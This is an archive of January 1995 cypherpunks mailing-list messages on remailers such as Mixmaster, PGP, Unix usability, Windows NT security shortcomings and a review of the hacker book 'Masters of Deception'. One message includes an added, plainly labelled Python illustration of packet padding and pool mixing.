Date: Thu, 26 Jan 95 09:26:14 PST
To: cypherpunks@toad.com
Subject: MixMaster remailer source
Message-ID: <9501261726.AA18771@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


    A little while back when the "remailer crisis" discussion was in
full swing, L. McCarthy recommended the Mixmaster remailer as being the
most modern. After several days of hunting, I have utterly failed to
turn up the source to this remailer. Can anyone provide me a pointer?

    On a slightly related note, is there a validation suite for PGP? The
MIT distribution does not include OS/2 binaries, unfortunately, but I
have managed to get a clean build. It seems to work, but I simply don't
know enough about PGP to be sure that it really is a fully working
version.

    Kevin

    At Intel, quality is job 0.999731.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Thu, 26 Jan 95 08:54:40 PST
To: sorr@eznet.net
Subject: RE: Identity
Message-ID: <950126105452.6824@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain



Gannett sucks.

Kare 11 sucks.

USA Today sucks.

St. Cloud Times sucks.

Gannett==sucks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Thu, 26 Jan 95 08:25:59 PST
To: cypherpunks@toad.com
Subject: Re: Unix, Linux, NeXTStep, etc.
Message-ID: <199501261622.LAA22690@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501260513.VAA11989@netcom7.netcom.com>,
Timothy C. May <tcmay@netcom.com> wrote:
>I was about to say the same thing! Not to push NeXTStep per se, as it
>is apparently doomed for a variety of reasons,  but to say that
>popular applications can be--and have been--ported to Unix.

Actually, while NeXTStep per se may be doomed, its spirit might very
well end up surviving.  The move towards integrating it with Solaris 2
and other vendor unices is a heartening one, to say the least.

I still want a WYSIWYG editor that spews TeX.
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyeTTBNhgovrPB7dAQHqzgP/UGxrIMKUMHVneOLPHu7yRkjm7CztPIzu
E46PIPt2ZXdnMDIvHAGekx3SZ8tH1EY6Fl/MBHpYrUxh6XRY+MsaPw8JlAi8cs3t
cEfsyS1GbZ50z3731CQcjS7HDX7PGCYqjxm8fMqvEx8Z0BrrhGnWfBdq8Caonpyt
MRFG2uoyIBo=
=F4SP
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyfMISoZzwIn1bdtAQFOYQF9FtrdZCf390uGkHjwfK+BWCpYcGv3uj0w
eV5X0B36qrocwT9Sma3agHRx5AWsS4RV
=tOUY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 08:21:24 PST
To: cypherpunks@toad.com
Subject: Re: Fuck Gannett
In-Reply-To: <199501260302.DAA18137@ns.cityscape.co.uk>
Message-ID: <199501261623.LAA06539@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone wrote anonymously:
> Fuck Gannett.

Keith Cross writes:
# I'm glad it was said

Why ?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jallen@pen.k12.va.us (Jeffrey C. Allen)
Date: Thu, 26 Jan 95 08:30:28 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Electronic Security
Message-ID: <9501261630.AA155529@pen1.pen.k12.va.us>
MIME-Version: 1.0
Content-Type: text/plain


I have been lurking for a while, trying to learn.

Someone asked about electromagnetic shielding.  I remembered an
article in Popular Science.  It was July 1989 on p. 87.  It
described a _fabric_ which provided 100 dB of shielding.  I
have not used it, but thought I would pass on the reference.
It is called Saf'n'Shielded and is produced by International
Paper.  Hope this helps.
-- 
{---------------------------------------------------------}
J. C. Allen
Ass't. Technology Coordinator
Episcopal High School
Alexandria, VA  22303
jallen@pen.k12.va.us
{---------------------------------------------------------}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmueller@gac.edu
Date: Thu, 26 Jan 95 09:43:07 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Privacy of Voice Mail?
Message-ID: <199501261742.LAA19832@shadow.gac.edu>
MIME-Version: 1.0
Content-Type: text/plain


From 1/24/95 Edupage

Forwarded message:
> 
> HOW PRIVATE IS VOICE MAIL?
> A lawsuit filed by a former McDonald's employee whose private voice mail
> messages to his paramour were recorded and played for his wife may
> determine the question of whether voice mail boxes are granted the same
> confidentiality protections as live telephone calls or postal mail. The
> ACLU argues that electronic eavesdropping should be avoided, but the U.S.
> Chamber of Commerce takes the stance that businesses have the right to
> ensure their electronic equipment is used for legitimate purposes.
> (Times-Picayune 1/23/95 A3)
> 

Comments?

--
    Joel Mueller - "Here lies one whose name is writ in water."    -Keats
   		   Check my .plan for my PGP Public Key.  
 		    PGP encrypted mail is very welcome!
  This must be Thursday.  I never could get the hang of Thursdays.  -Dent



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Jan 95 08:55:51 PST
To: cypherpunks@toad.com
Subject: NYT on MOD
Message-ID: <199501261655.LAA27828@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 26, 1995, p. C17 
 
 
   Books of the Times 
 
 
   Kids or Conspirators: How Hackers Got Caught 
 
   MASTERS OF DECEPTION  
   The Gang That Ruled Cyberspace 
 
   By Michelle Slatalla and Joshua Quittner  
   225 pages. HarperCollins Publishers. $23. 
 
 
   By Christopher Lehmann-Haupt 
 
 
   It's difficult to feel much besides amused admiration for 
   the computer hackers spotlighted in "Masters of Deception: 
   The Gang That Ruled Cyberspace," by Michelle Slatalla and 
   Joshua Quittner, a married couple who are reporters for 
   Newsday. After all, what mainly characterizes the gang of 
   adolescents they write about is high intelligence, infinite 
   resourcefulness and boundless curiosity. 
 
 
   Among the Masters of Deception, as the gang is called, 
   there is Paul Stira, nicknamed Scorpion, who as a child 
   learned to program a computer even before he had his hands 
   on one and went on to master the art of cracking 
   computer-game copy-protection codes. Mark Abene, a k a 
   Phiber Optik, was so driven to understand how machines work 
   that he explored and mastered the most sophisticated of the 
   telephone company's computers. 
 
 
   Eli Landopoulos, or Acid Phreak, after helping lure Phiber 
   Optik away from a rival cyberspace gang, Legion of Doom, 
   was moved to write "The History of MOD" for other hackers 
   to envy. And John Lee, or Corrupt, found computer hacking 
   a better way to survive than running with a street gang. 
 
 
   It is difficult for the reader of this book to look upon 
   these and other members of the gang as criminals. Yet they 
   were eventually charged by a New York grand jury with 
   conspiring to "gain access to and control of computer 
   systems in order to enhance their image and prestige among 
   computer hackers," among other counts. And they ended up 
   pleading guilty and serving jail terms, which they have 
   completed. 
 
 
   In telling their stories, Ms. Slatalla and Mr. Quittner 
   have almost as hard a time finding a continuous thread as 
   the Government did building a coherent case against the 
   hackers. The authors begin by describing a crash of the 
   AT&T long-distance system that occurred on Jan. 15, 1990. 
   The authors write of the gang's reaction to this crisis: 
   "No self-respecting computer hacker would ever destroy 
   anything. No hacker would ever purposely hurt the phone 
   system. Paul just wanted to look around. He just wanted to 
   learn more. He'd know it if he'd done something bad. 
   Wouldn't he?" 
 
 
   The lively narrative then backtracks to tell how the 
   hackers formed their gang the previous year. This sequence 
   creates the impression that the gang will turn out to have 
   caused the crash, an expectation that is buttressed by 
   other evidence that Ms. Slatalla and Mr. Quittner describe. 
   The boys crashed smaller systems they invaded, like the 
   Learning Link, a collection of electronic bulletin boards 
   for educators and librarians that is owned by Channel 
   13/WNET, New York City's public broadcasting television 
   station. 
 
 
   The gang left the message "Happy Thanksgiving you turkeys, 
   from all of us at MOD," which prevented access to the 
   bulletin board's files. As the authors write, "the Learning 
   Link crash would become the pivotal event in the case that 
   the Federal Government was slowly building against the boys 
   in MOD." The process was slow because the investigators had 
   to weigh the need for evidence against the risk of damage. 
   As the authors write: "It was kind of like having a 
   tarantula crawl up your leg. If you shook it off too fast, 
   it would escape into the wall. But if you waited too long, 
   you got bitten." 
 
 
   But when, about half way through the book, the narrative 
   arrives back at the AT&T crash of 1990, we learn that the 
   failure was traced not to anything the hackers did but to 
   what the authors describe as "a routine update of the AT&T 
   software." True, the gang did much that was wrong, like 
   creating and using unbillable telephone accounts, 
   trespassing in cyberspace to make long-distance calls, 
   looking up private information and using it to harass other 
   hackers and stealing and selling other people's credit card 
   numbers. 
 
 
   In short, certain members crossed the line between hacking 
   and cracking and thereby violated the hacker ethic, which 
   holds, in the authors' words: "Thou shalt not destroy. It's 
   O.K. to look around, but don't hurt anything. It's good 
   enough just to be here." 
 
 
   Yet the fact remains that the gang did not cause the AT&T 
   crash. And the worst that was done appears to have happened 
   at a remove from what Mr. Abene was responsible for and 
   after Mr. Stira had more or less withdrawn from hacking. 
   Yet these two received the stiffest sentences. Mr. Abene, 
   the last to complete his sentence, was released in the fall 
   of last year. So one has the impression that what mattered 
   to the Government was less the mischief done than the 
   potential for mischief. 
 
 
   What the slightly jumbled narrative does capture 
   effectively is the contrast between the manic glee of the 
   hackers at the prospect of a vast new unexplored world to 
   conquer, and the Government's nervous disapproval and 
   understandable need to set limits on a mysterious new 
   frontier. The authors try to present both points of view. 
   They don't reveal where their sympathies lie until the last 
   line of their book. Here, after describing the meeting of 
   a hackers' club as "the milling clumps of boys" who "are 
   the picture of entropy, of disorganization, of isolated 
   growing pains and undeveloped social skill," they write 
   with tongue in cheek as their concluding paragraph: 
 
 
   "This is the conspiracy." 
 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:12:13 PST
To: Kevin Marcus <datadec@cs.ucr.edu>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <9501261711.AA16623@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Kevin Marcus says:
> Unfortunately, however, there are a lot of things that a lot of people can't
> do in a unix system.  Unix is probably the most widely used unfriendly,
> cryptic, and complicated operating system today.

Unix is perfectly easy to use. It's no worse than DOS.

I'm constantly amazed by people saying "why, Unix is so unfriendly!
What does "ls" mean to a naive user". Well, what does "dir" mean to a
naive user? Since when is "dir" the intuitive way to list the contents
of something?

Now, it's true that Windows is friendlier than DOS, but there are good
windowing systems on Unix that provide equally easy to use front ends.

Anyone who claims that "Unix" is unfriendly hasn't looked at the
machine that they are using -- or they are bigots who think that the
strange commands that they know are natural whereas other people's are
magically unnatural.

> With the upcoming of
> Linux, this will probably change somewhat in the future, but until I can
> teach my secretary how she can use latex to type and print her letters, we
> are going to be stuck with getting us whatever the bastards at MicroSoft
> think we want.

Teach her how to use FrameMaker, or IslandWrite, or something
similar. IslandWrite is no more unfriendly than MacWrite was. If you
want to teach her to use latex, that's actually quite feasible, but it's
not needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 26 Jan 95 09:23:02 PST
To: cypherpunks@toad.com
Subject: An article on Windows (in)security
Message-ID: <9501261717.AA08133@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
>From: first@individual.com (An Information Service of INDIVIDUAL Inc.) (by
>way of
[Some initial stuff seems missing, sorry.]

>  ``No.''
>
>  And so it went. Once the security configuration is established and the
>security profiles are put in a database-like protected file system,
>accessing that data to get a full view of the security policy implementation
>is near impossible. An administrator must retrieve individually each piece
>of data stored in the security database, then manually collate and compile
>it into a usable form.
>
>  In a large operation, the security administrator will build a security
>database by virtue of the number of objects and characteristics assigned to
>each object during configuration. But Windows NT offers little way to access
>and manipulate that database for analysis, rapid reconfiguration or global
>views. It appears, and Microsoft engineers agree, someone will have to build
>a utility program to take advantage of the security database via the maze of
>APIs available to third-party developers.
>
>  Kevin Phaup, program manager lead of Microsoft's Business Systems
>Division, put the best spin he could on this first major Windows NT
>shortcoming. ``Pull the data into a database and then massage it,'' he said.
>``We have a new product - System Management Server from the Back Office
>Suite - that could help.''
>
>  I agree, but why would I want to buy a brand-new operating system that
>needs help out of the box?
>
>  What's more, the third-party database solution for security administration
>is a hopeless short-term patch. To be truly effective, it needs a much
>tighter integration with Windows NT's APIs to permit not only systemic
>analysis, but also systemic security changes based on selected criteria.
>
>  If administrators want to change the access rights of every user so they
>can log on at 7 a.m. instead of 8 a.m., they cannot do it with Windows NT
>3.5. They might be able to do it with a third-party product or with Windows
>NT 4.0.
>
>  ``If someone builds an administration product like that, they'll make a
>lot of money,'' Phaup says.
>
>  A WEEKEND'S WORK
>
>  Windows NT has other security problems, as well. For
>example, it does not have data cryptography, which is essential to make sure
>a network is reasonably secure from eavesdropping and integrity breaches.
>Microsoft, which knows encryption technology, easily could have included the
>appropriate algorithms in software to make Windows NT more secure.
>
>  Microsoft's Phaup agrees it would have been simple to add encryption to
>Windows NT. ``The hooks are all there,'' he said.
>
>  But Windows NT does not need cryptography for C2 certification. And
>perhaps even more telling, Microsoft cannot export cryptography outside the
>U.S. due to export control laws that prohibit it from doing so without
>licensing. Of course, the company could have made two versions of Windows
>NT: one with cryptography for domestic use and one without cryptography for
>export.
>
>  According to Phaup, Microsoft was reluctant to do so for two reasons.
>``Security is way down on the list of corporate concerns and desires and
>wants in an OS. It's in the top 20, but not the top 3,'' he says. ``And the
>testing cycle would have been a double killer.''
>
>  Windows NT's last major shortcoming lies in the omission of a feature that
>most security experts consider virtually indispensable: boot control.
>
>  In the DOS/Windows world, third-party PC security is reasonably attempted
>by forcing users to boot from the C drive and making them log on with IDs
>and passwords. However, if a bootable DOS diskette is inserted in the A
>drive, the PC will boot without a logon, and the A:> will appear.
>
>  But if the user attempts to log over to the C drive, the system will come
>back with a message such as: Invalid drive specification. Security experts
>recognize this as an inexpensive technique that will keep out casual
>intruders and nontechnical types.
>
>  One way to mandate boot control is with a hardware or firmware addition to
>the PC in the form of an add-on card. The hardware boot process is
>interrupted, and then even access to the A drive can be restricted until the
>actual logon process through the legal boot drive has been successfully
>completed.
>
>  In Windows NT, boot control does not even exist as an option. Again, this
>suggests that Microsoft's security effort was driven by C2 certification,
>not by security itself.
>
>  In its defense, there is a lot to like about Windows NT and the plethora
>of functionality it offers from the application standpoint. But Windows NT
>sorely lacks in security, so much so that it almost would be safer not to
>use any security.
>
>  Windows NT must evolve quickly to garner a spot in the secure operating
>system arsenal or somehow steal market share from the likes of Novell. It
>just is not there yet. But Microsoft's Phaup left me with one closing
>thought. ``Have you talked to the Cairo [Windows 95.5] guys yet?''
>
>  Schwartau is an independent consultant, writer and lecturer on network
>security topics. He can be reached at Interpact, Inc. at (813) 393-6600, or
>via electronic mail at P00506@psilink.com.
>
>[01-23-95 at 15:10 EST, Copyright 1995, Network World, File: x0123303.8dn]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:20:17 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <199501260638.BAA07072@duke.bwh.harvard.edu>
Message-ID: <9501261719.AA16636@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack says:
> It may be that the FBI has a couple of Suns handling the whole
> remailer network right now.

If they are doing that, they are violating the ECPA. They are allowed
to monitor only those things they have a warrant to monitor (with, of
course, all those lovely National Security exceptions). This is not to
say that it isn't being done, but it can't be used in court.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:45:36 PST
To: M00012@kanga.stcloud.msus.edu
Subject: Re: Identity
In-Reply-To: <950126105452.6824@kanga.stcloud.msus.edu>
Message-ID: <9501261745.AA16711@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Leaving our terminal unattended, or are we just still waiting for our
lobotomy?

.pm

M00012@kanga.stcloud.msus.edu says:
> 
> Gannett sucks.
> 
> Kare 11 sucks.
> 
> USA Today sucks.
> 
> St. Cloud 
> Times sucks.
> 
> Gannett==sucks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Greenberg <0007333626@mcimail.com>
Date: Thu, 26 Jan 95 12:56:02 PST
To: "cypherpunks@toad.com>
Subject: Remote command execution PGP script
Message-ID: <24950126180642/0007333626PJ1EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


About a year and a half ago one of the Perl wizards on this list posted a
script which would allow you to mail a PGP-encrypted script to an account
and (if the signature checked out) execute the script on the remote system.
This would be extremely useful to me right now.  Anybody have a copy of
that script so that I don't have to reinvent the wheel?

                                         Thanks,
                                         Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 26 Jan 95 13:23:11 PST
To: klbarrus@owlnet.rice.edu (Karl Lui Barrus)
Subject: Re: Starting a remailer
In-Reply-To: <9501261541.AA10742@snowy.owlnet.rice.edu>
Message-ID: <199501262120.NAA10701@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Ah but if you *really* want to run out of an .edu address,
contact me about getting an alias in leri.edu.


> 
> Mo Baxter wrote:
> >I need info on what's needed to operate a secure remailer out of an edu
> >address.  I'd appreciate anything about software, installation, maintenance,
> >problems, etc... 
> 
> If you are thinking of setting up a remailer on a general usage type
> unix shell account, then first find out if the usage policy allows you
> to run one (for example, remailers are forbidden here at Rice).
> Actually, I would recommend asking first, to head off future
> headaches, as I can think of at least two other (former) remailers run at
> .edu sites that were forced to close.
> 
> Other than that, try to find out if sendmail logs are kept, especially
> if they are world readable (this will reduce the security of the
> remailer, but you won't be able to do anything about it anyway).
> 
> The software is easily available, installation isn't hard (you have to
> install PGP as well).  Maintenance isn't much unless you experiment
> around.  I would recommend blocking anonymous mail to whitehouse.gov
> and other similar addresses.
> 
> I don't know about problems; I never had any, but these days it seems
> more and more people are finding out about remailers, and with that
> comes abusers.  John Perry had to shut down because of abuse, after
> withstanding the RC4 posting crisis.  Be prepared for some hassles.
> 
> Actually, I would recommend finding a remailer-friendly site like
> c2.org and setting up there.
> 
> -- 
> Karl L. Barrus: klbarrus@owlnet.rice.edu         
> 2.3: 5AD633;   D1 59 9D 48 72 E9 19 D5  3D F3 93 7E 81 B5 CC 32 
> 2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5  E8 97 64 7E 20 95 60 D9
> "One man's mnemonic is another man's cryptography" - K. Cooper
> 


-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 11:24:06 PST
To: perry@imsi.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501261922.AA07092@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Adam Shostack says:
>  > It may be that the FBI has a couple of Suns handling the whole
>  > remailer network right now.

Perry Metzger replies:
>  If they are doing that, they are violating the ECPA. They are
>  allowed to monitor only those things they have a warrant to monitor
>  (with, of course, all those lovely National Security exceptions).
>  This is not to say that it isn't being done, but it can't be used
>  in court.

Is this even technically possible?  That is, wholesale monitoring of  
disparate portions of the net from a single access point.  Given the  
distributed and dynamic properties of the Net this would seem impossible.  To  
monitor the entire remailer network an attacker would have to set up packet  
sniffers upstream from each and every portion of the Net that contained a  
remailer, wouldn't they?

I suppose an extremely resourceful attacker could monitor traffic at crucial  
points (i.e. transcontinental feeds, points on the NSFnet, CIX, etc...), but  
there are so many private connections linking networks that it would be very  
difficult indeed to sniff out every bit of remailer traffic.  Is having every  
bit of remailer traffic necessary for traffic analysis?  Or would having a  
good percentage of it be sufficient?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 26 Jan 95 11:23:30 PST
To: cypherpunks@toad.com
Subject: CERT statement
In-Reply-To: <199501260516.AAA17150@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Is it my imagination, or is CERT just trying to firewall up the internet 
into uselessness?

What we need to concentrate on is secure systems that are not vulnerable 
to IP spoofing, as opposed to firewalls.

But of course, more firewalls makes more free transfer of information 
across the internet more difficult...perhaps this is what the government 
is interested in reducing.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 26 Jan 95 11:36:49 PST
To: kevin@elvis.wicat.com
Subject: Re: MixMaster remailer source
In-Reply-To: <9501261726.AA18771@toad.com>
Message-ID: <Pine.SUN.3.91.950126143409.25147A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995 kevin@elvis.wicat.com wrote:

>     A little while back when the "remailer crisis" discussion was in
> full swing, L. McCarthy recommended the Mixmaster remailer as being the
> most modern. After several days of hunting, I have utterly failed to
> turn up the source to this remailer. Can anyone provide me a pointer?

	Send mail to the author, Lance Cottrell <loki@nately.ucsd.edu>. 
He'll give you the hidden directory on his ftp site nately.ucsd.edu once 
he verifies that you're in the US or Canada.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 26 Jan 95 14:44:59 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Even more unix holy war.  Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501261711.AA16623@snark.imsi.com>
Message-ID: <Pine.3.89.9501261422.A26742-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> Unix is perfectly easy to use. It's no worse than DOS.

Thanks for the entertainment Perry.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 12:56:35 PST
To: cypherpunks@toad.com
Subject: pgp content type RFC
Message-ID: <9501262055.AA07113@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please provide me with the number of the MIME PGP content-type RFC?

thanks!
andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 11:57:13 PST
To: cypherpunks@toad.com
Subject: Re: MixMaster remailer source
In-Reply-To: <9501261726.AA18771@toad.com>
Message-ID: <199501261958.OAA06997@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kevin writes:
>     A little while back when the "remailer crisis" discussion was in
> full swing, L. McCarthy recommended the Mixmaster remailer as being the
> most modern. After several days of hunting, I have utterly failed to
> turn up the source to this remailer. Can anyone provide me a pointer?

Due to the ITAR, you have to get it from Lance Cottrell by request (and you
have to be in the U.S./Canada):

--- begin included excerpt of message ---
From: Lance Cottrell
Date: Sun, 8 Jan 1995 00:09:54 -0800
To: cypherpunks@toad.com

[...]
Message size can best be handled by using a remailer which uses messages
which never change size. Mixmaster is now ready for testing.
It still does not run on Linux or FreeBSD. I don't know what else it does
run on. It works great on Sun machines with gcc.

Since it is export restricted, send me mail and I will send you the name of
the hidden directory to get the file.
[...]
--- end included excerpt of message ---

His primary account is loki@nately.ucsd.edu; he also has a dialup account --
lcottrell@popmail.ucsd.edu. He's on the c'punks list (Hi Lance !).

In addition to being backwards-compatible with the Finney/Ghio/Hughes format
of remailer messages, Mixmaster supports a new message format in which all
original messages are chopped/padded for transmission, resulting in a uniform
packet size. Mixmaster also automatically reorders messages of all formats, 
using a fixed-size pool.

Mixmaster is designed around PGPTools, with the intent to support full use of
PGP. Unfortunately I've seen some empirical evidence that PGP messages don't
quite work with the system at present. Neither of the Mixmaster remailers of
which I'm aware ("mix" and "q") is indicated as supporting PGP in Raph's
current list. Solving this apparent problem, and porting Mixmaster to Ultrix
(might be trivial, I haven't tried yet) are among my top c'punk priorities
right now.

Of course it would be nice to produce an exportable version of Mixmaster too...

 -L. Futplex McCarthy, seeking a summer job/internship; BS CS Cornell + 2 yrs.
  grad school in theoretical computer science (algebraic algorithms), planning
  a Ph.D.; send private email for, or with, further info

[I don't speak for Lance Cottrell and he doesn't speak for me.]
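
The two properties described in the message above, chopping/padding every message to a uniform packet size and reordering through a fixed-size pool, as an added Python example. It is not Mixmaster's code or packet format: the 1024-byte packet size, the header layout, the pool size of 4 and all function names are assumptions chosen for illustration.

```python
"""Added example: uniform-size packets plus a fixed-size reordering pool.

Assumptions (not Mixmaster's real format): 1024-byte packets, a 22-byte
plaintext header, a pool of 4. A real remailer encrypts every packet so the
header is not visible on the wire; encryption is left out here to keep the
focus on packet size and ordering.
"""
import os
import random
import struct

PACKET_SIZE = 1024
# message id, chunk index, chunk count, number of real data bytes in this packet
HEADER = struct.Struct(">16sHHH")
PAYLOAD_SIZE = PACKET_SIZE - HEADER.size


def split_into_packets(message):
    """Chop a message into chunks and pad each one to exactly PACKET_SIZE."""
    msg_id = os.urandom(16)
    chunks = [message[i:i + PAYLOAD_SIZE]
              for i in range(0, len(message), PAYLOAD_SIZE)] or [b""]
    if len(chunks) > 0xFFFF:
        raise ValueError("message too large for a 16-bit chunk count")
    packets = []
    for index, chunk in enumerate(chunks):
        # Random padding, so a short message is the same size as a full chunk.
        padding = os.urandom(PAYLOAD_SIZE - len(chunk))
        header = HEADER.pack(msg_id, index, len(chunks), len(chunk))
        packets.append(header + chunk + padding)
    return packets


def reassemble(packets):
    """Rebuild complete messages from packets that arrive in any order.

    Returns {message id: message bytes}; messages with missing chunks are
    left out.
    """
    parts, totals = {}, {}
    for packet in packets:
        if len(packet) != PACKET_SIZE:
            raise ValueError("packet is not the uniform size")
        msg_id, index, count, length = HEADER.unpack_from(packet)
        if length > PAYLOAD_SIZE or index >= count:
            raise ValueError("malformed packet header")
        start = HEADER.size
        parts.setdefault(msg_id, {})[index] = packet[start:start + length]
        totals[msg_id] = count
    return {m: b"".join(parts[m][i] for i in range(totals[m]))
            for m in parts if len(parts[m]) == totals[m]}


class PoolMix:
    """Fixed-size pool: once it is full, every arrival releases one packet
    chosen uniformly at random, so output order is decoupled from input
    order."""

    def __init__(self, pool_size, rng=None):
        self.pool_size = pool_size
        self.pool = []
        self.rng = rng or random.SystemRandom()

    def accept(self, packet):
        """Add a packet; return the packet released, or None while filling."""
        self.pool.append(packet)
        if len(self.pool) <= self.pool_size:
            return None
        pick = self.rng.randrange(len(self.pool))
        self.pool[pick], self.pool[-1] = self.pool[-1], self.pool[pick]
        return self.pool.pop()

    def flush(self):
        """Release everything still held, in random order."""
        self.rng.shuffle(self.pool)
        released, self.pool = self.pool, []
        return released


def demo():
    """Run three constructed messages of different lengths through the mix."""
    messages = [b"short note", b"x" * 3000, b""]   # constructed sample input
    mix = PoolMix(pool_size=4)
    sent = [p for m in messages for p in split_into_packets(m)]
    released = []
    for packet in sent:
        out = mix.accept(packet)
        if out is not None:
            released.append(out)
    released += mix.flush()
    return sent, released


if __name__ == "__main__":
    sent, released = demo()
    print("packet sizes seen on the wire:", sorted({len(p) for p in sent}))
    print("messages recovered:", len(reassemble(released)))
```

The pool never shrinks below its fixed size until it is flushed, which is why a low-traffic mix of this kind adds latency in exchange for reordering.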



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Date: Thu, 26 Jan 95 12:16:59 PST
To: cypherpunks@toad.com
Subject: Internet Mailing lists book
Message-ID: <Pine.3.05.9501261542.A15834-b100000@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain


I found a 1993 version of this book (is there a 94 or 95?) it unfortunately
lacks the cypherpunks list. >8-(


===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
